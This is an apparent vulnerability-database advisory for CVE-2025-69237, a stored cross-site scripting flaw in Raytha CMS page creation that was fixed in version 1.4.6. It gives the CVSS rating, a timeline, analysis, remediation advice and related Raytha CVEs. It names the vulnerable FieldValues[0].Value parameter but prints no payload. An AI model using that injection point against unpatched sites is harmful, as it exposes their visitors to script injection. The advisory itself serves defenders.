Skip to main content

Raytha EUVDEUVD-2025-208701

| CVE-2025-69237 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-03-16 CERT-PL
5.1
CVSS 4.0 · NVD
Share

Severity by source

NVD PRIMARY
5.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
P

Lifecycle Timeline

4
Patch available
Apr 16, 2026 - 05:29 EUVD
1.4.6
EUVD ID Assigned
Mar 16, 2026 - 12:00 euvd
EUVD-2025-208701
Analysis Generated
Mar 16, 2026 - 12:00 vuln.today
CVE Published
Mar 16, 2026 - 11:53 nvd
MEDIUM 5.1

DescriptionCVE.org

Raytha CMS is vulnerable to Stored XSS via FieldValues[0].Value parameter in page creation functionality. Authenticated attacker with permissions to create content can inject arbitrary HTML and JS into website, which will be rendered/executed when visiting edited page.

This issue was fixed in version 1.4.6.

AnalysisAI

Raytha CMS contains a Stored Cross-Site Scripting (XSS) vulnerability in the page creation functionality through the FieldValues[0].Value parameter, allowing authenticated attackers with content creation permissions to inject malicious HTML and JavaScript that executes when other users visit the edited page. The vulnerability affects Raytha CMS versions prior to 1.4.6 and has a CVSS score of 5.1 with limited scope impact due to required authentication and user interaction. While not currently listed in CISA's Known Exploited Vulnerabilities catalog, the low attack complexity and availability of vendor patch make this a moderate but manageable risk for deployed instances.

Technical ContextAI

This vulnerability is an instance of Stored XSS (CWE-79: Improper Neutralization of Input During Web Page Generation) in a content management system. Raytha CMS fails to properly sanitize or encode user-supplied input in the FieldValues parameter during page creation operations, allowing arbitrary HTML and JavaScript to be persisted in the database and subsequently rendered without proper output encoding. The root cause stems from insufficient input validation or lack of context-aware output encoding when page content is retrieved and displayed to end users. The vulnerability exists in Raytha CMS versions before 1.4.6, indicating the flaw has been present across multiple minor version releases. This type of stored XSS is particularly dangerous because the malicious payload is persistent and affects all users who view the compromised page, unlike reflected XSS which requires a crafted link.

RemediationAI

Upgrade Raytha CMS to version 1.4.6 or later immediately, which includes the fix for this stored XSS vulnerability. The upgrade process should follow the vendor's documented migration and backup procedures to prevent data loss. For organizations unable to patch immediately, implement compensating controls by restricting page creation permissions to a minimal set of trusted administrators, implementing Content Security Policy (CSP) headers with script-src restrictions, and enabling security auditing on all content modifications to detect suspicious activity. Additionally, enforce regular security reviews of published pages and consider implementing an approval workflow for page creation and modification to add a human review layer before content becomes publicly visible.

More in Raytha

View all
CVE-2026-12076 CRITICAL
9.3 Jun 30

SQL injection in Raytha CMS 1.5.2 lets a remote, unauthenticated attacker inject arbitrary SQL through the OData filter

CVE-2025-15540 HIGH
8.8 Mar 16

A code injection vulnerability in Raytha CMS's Functions module allows privileged users to execute arbitrary .NET operat

CVE-2025-69240 HIGH
7.5 Mar 16

A host header injection vulnerability in Raytha CMS allows attackers to hijack password reset tokens by spoofing X-Forwa

CVE-2025-69243 MEDIUM
6.9 Mar 16

Raytha CMS contains a user enumeration vulnerability in its password reset functionality where differing error messages

CVE-2025-69246 MEDIUM
6.9 Mar 16

Raytha CMS lacks brute force protection mechanisms, allowing attackers to conduct unlimited automated login attempts wit

CVE-2025-69238 MEDIUM
6.9 Mar 16

Raytha CMS contains a Cross-Site Request Forgery (CSRF) vulnerability across multiple endpoints that fails to enforce to

CVE-2025-69241 MEDIUM
5.3 Mar 16

Raytha CMS contains a Stored Cross-Site Scripting (XSS) vulnerability in the profile editing functionality, specifically

CVE-2025-69245 MEDIUM
5.1 Mar 16

Raytha CMS contains a Reflected Cross-Site Scripting (XSS) vulnerability in the logon functionality's returnUrl paramete

CVE-2025-69242 MEDIUM
5.1 Mar 16

Raytha CMS contains a reflected cross-site scripting (XSS) vulnerability in the backToListUrl parameter that allows unau

CVE-2025-69236 MEDIUM
5.1 Mar 16

Raytha CMS contains a Stored Cross-Site Scripting (XSS) vulnerability in the post editing functionality, specifically wi

CVE-2025-69239 MEDIUM
5.1 Mar 16

Raytha CMS contains a Server-Side Request Forgery (SSRF) vulnerability in its Theme Import from URL feature that allows

Share

EUVD-2025-208701 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy